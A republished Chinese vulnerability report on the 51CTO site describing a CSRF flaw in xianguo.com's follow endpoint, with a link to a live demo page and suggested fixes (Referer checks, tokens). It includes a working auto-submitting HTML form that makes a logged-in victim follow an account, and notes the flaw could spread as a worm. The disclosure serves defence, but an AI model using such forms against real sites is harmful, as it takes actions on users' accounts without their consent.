51CTO首页
AI.x社区
博客
学堂
精品班
直播训练营
企业培训
鸿蒙开发者社区
WOT技术大会
AIGC创新中国行
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术2024年软考PMP项目管理软考资讯
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO题库小程序
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
账号设置 退出

鲜果网某处CSRF漏洞可蔓延蠕虫

作者:imlonghao
安全 漏洞
鲜果网某处CSRF漏洞,可能导致蠕虫蔓延,在未经用户同意的情况下发布文字、加关注等等!

鲜果网某处CSRF漏洞,可能导致蠕虫蔓延,在未经用户同意的情况下发布文字、加关注等等!

详细说明:在接受POST和GET的信息的时候,未对POST来路(Referer)进行验证,同时也没有在POST的信息中加token验证信息的正确性,导致漏洞产生。

演示地址:http://in.imlonghao.com/WooYun-XXXXX/ (用户名/密码:imlonghao)

登录状态下访问,会自动发一条名为Hello World的微博,并会关注一个用户。

漏洞地址:http://xianguo.com/beings/follow

<html>

<body>

<form id="imlonghao" name="imlonghao" action="http://xianguo.com/beings/follow" method="post">

<input type="text" name="beingsIds" value="1378148" />

<input type="text" name="parentId" value="0" />

<input type="text" name="ftype" value="0" />

</form>

<script>

document.imlonghao.submit();

</script>

</body>

</html>

接口返回信息

鲜果网某处CSRF漏洞可蔓延蠕虫

效果

[[97443]]

【发文字】

修复方案:

检查POST来路Referer

在POST的信息中加token

责任编辑:蓝雨泪 来源: 2cto
CSRF漏洞漏洞鲜果网
相关推荐
“老派”Morto蠕虫病毒通过RDP蔓延
各种互联网安全公司的报告显示,一个新的互联网蠕虫病毒正在广泛传播,它利用了Windows系统上的弱口令,并通过Windows远程桌面协议(RemoteDesktopProtocol,RDP)传播。

2011-08-31 14:38:40

浅谈CSRF漏洞挖掘技巧
CSRF(Crosssiterequestforgery跨站请求伪造,也被称成为“oneclickattack”或者sessionriding。

2013-04-24 15:56:40

多步CSRF漏洞场景及其利用
平时大家讨论的CSRF利用多是发送一次请求。比如CSRF刷粉丝,CSRF发微博。本文主要讨论一个稍微复杂点的利用场景。

2015-02-10 13:24:27

CSRF漏洞CSRF
警惕感染QQ、迅雷的蠕虫程序
卡巴斯基实验室近期截获一种名为“改变你一生”蠕虫的最新变种(Worm.Win32.AutoRun.hfy)。而且发现,此蠕虫可以感染常用软件QQ和迅雷。

2010-07-20 10:26:50

一款针对Tomcat服务器的Java蠕虫在全球蔓延
最近赛门铁克的安全研究员发现了一款新的针对Tomcat服务器的跨平台蠕虫。这款恶意软件被命名为”Java.Tomdep”,跟其他服务器后门不一样的是,不是常见的php写的,而是用java写的蠕虫,作为一个javaservlet运行在tomcat上。

2013-12-02 13:34:55

OpenVPN桌面客户端爆CSRF漏洞
Consult的安全研究员发现OpenVPN的桌面客户端存在CSRF漏洞。成功利用该漏洞,可以实现远程命令执行。openvpn已经发布公告,建议受影响的客户端版本立刻升级到最新版。

2014-07-17 15:47:52

三问12306站数据泄露 填补哪些漏洞?
12月25日,12306这家被广泛用于订购火车票的官方网站,被指流出约13万用户数据。其中包括姓名、身份证号、手机号、用户名、密码等敏感信息。尽管铁路警方调查宣称事件由黑客“撞库”导致,数据并非从12306网站泄露,但12306网站的安全体系仍有完善的空间。

2014-12-30 14:02:54

乌云曝招行银存漏洞 窃取个人信息
7月30日下午,国内知名互联网漏洞平台乌云表示,招商银行的网银存漏洞,其网页版、个人电脑端、手机APP均受影响,黑客可以通过此漏洞窃取个人信息。不过,招行昨天回应称,客户如果正常使用招行网银,不会导致信息泄露和资金损失。

2014-08-01 09:12:39

首款利用SSH漏洞的iPhone蠕虫病毒现身
最近有部分使用了越狱破解软件的iPhone用户称他们的手机受到了一种蠕虫病毒的攻击,不过幸运的是这种病毒发作后只会偷偷将手机的背景图片换成80年代歌星RickAstley的图片。

2009-11-09 19:59:47

CSRFTester:一款CSRF漏洞的测试工具
CSRFTester是一款CSRF漏洞的测试工具,讲工具之前,先大概介绍一下CSRF漏洞,CSRF英文全称是CrossSiteRequestForgery,常被叫做跨站点伪造请求,是伪造客户端请求的一种攻击形式...

2011-05-10 09:55:14

安全漏洞XSS、CSRF、SQL注入以及DDOS攻击
随着互联网的普及,网络安全变得越来越重要,程序员需要掌握最基本的web安全防范,下面列举一些常见的安全漏洞和对应的防御措施。

2019-09-17 10:06:46

数据库程序员网络安全
容器管理:如何防止容器蔓延与成本蔓延
云计算中的容器简化并加速了程序的部署,但是这种易用性也导致用户更容易过度使用它。当公有云中发生这种情况时,容器蔓延会导致成本急剧上升。

2017-09-22 12:31:08

云计算容器容器蔓延
Twitter客户端TweetDeck爆漏洞 引发大规模XSS蠕虫
早上一如往常,我会登录各类社交网络。当我使用TweetDect登录Twitter后,弹出了一个提示框,显示“XSSonTweetDeck.”这让我感到很恼火,因为显然这不是正常的欢迎屏幕。

2014-06-12 13:44:19

蠕虫攻击微软零日漏洞 利用USB设备大肆传播
近日,微软被曝出一个新的零日漏洞(BID41732)。攻击者利用该漏洞中Windows操作系统解析快捷方式文件时的一个错误进行攻击。当用户访问存有攻击者精心构造的快捷方式的目录时,其包含的恶意代码便会被触发执行。

2010-07-28 16:02:51

钓鱼邮件利用路由器CSRF漏洞劫持巴西网民DNS
安全公司ProofPoint的研究人员于上周二发布了一个报告,报告中指出黑客正在通过更改DNS设置劫持巴西网民的网络连接。攻击者主要是利用家用路由器中存在的安全漏洞入侵,然后修改路由器DNS设置,这种攻击被称为pharming(网址嫁接攻击)。

2015-03-06 17:02:51

新的Log4J漏洞触发DoS漏洞
新的Log4j漏洞与Log4Shell类似,它也影响到了日志库。但这个DoS漏洞与ContextMap的查找有关,而不是和JNDI有关。

2021-12-23 09:47:36

Log4jRCE漏洞DoS漏洞
Google漏洞伪造域名邮箱钓鱼
近日GoogleAppsforWork曝出一个漏洞,攻击者可以利用该漏洞伪造任意网站的域名邮箱,冒充公司雇员给受害人发送钓鱼邮件。

2015-03-10 18:07:53

Apache Log4j 漏洞仍在蔓延,如何有效保护数字资产不受侵犯?
自上周五以来,由ApacheLog4j漏洞导致的威胁形势日趋紧张,原始漏洞的新变体正快速涌现—在不到24小时内出现了超过60个变种。

2021-12-23 16:35:54

Apache Log4
Windows DNS服务器曝"蠕虫级"漏洞,已存在长达17年
研究人员新发现一个高度严重的可蠕虫漏洞SigRed,CVSS评分为满分10分。该漏洞影响2003年2019年的WindowsServer版本。

2020-07-16 11:51:37

漏洞WindowsDNS服务器
iOS存在重大漏洞 绕开安全机制
苹果的iOS被认为是最稳定和安全的平台,iPhone和iPad也成了世界各地移动移动设备用户的选择。尽管iOS是基于Unix内核,但它也并不是无坚不摧。不过,与恶意软件温床安卓平台相比,你似乎并没有听说iOS出现过向恶意软件大门敞开的致命缺陷。

2013-08-07 10:07:04

点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服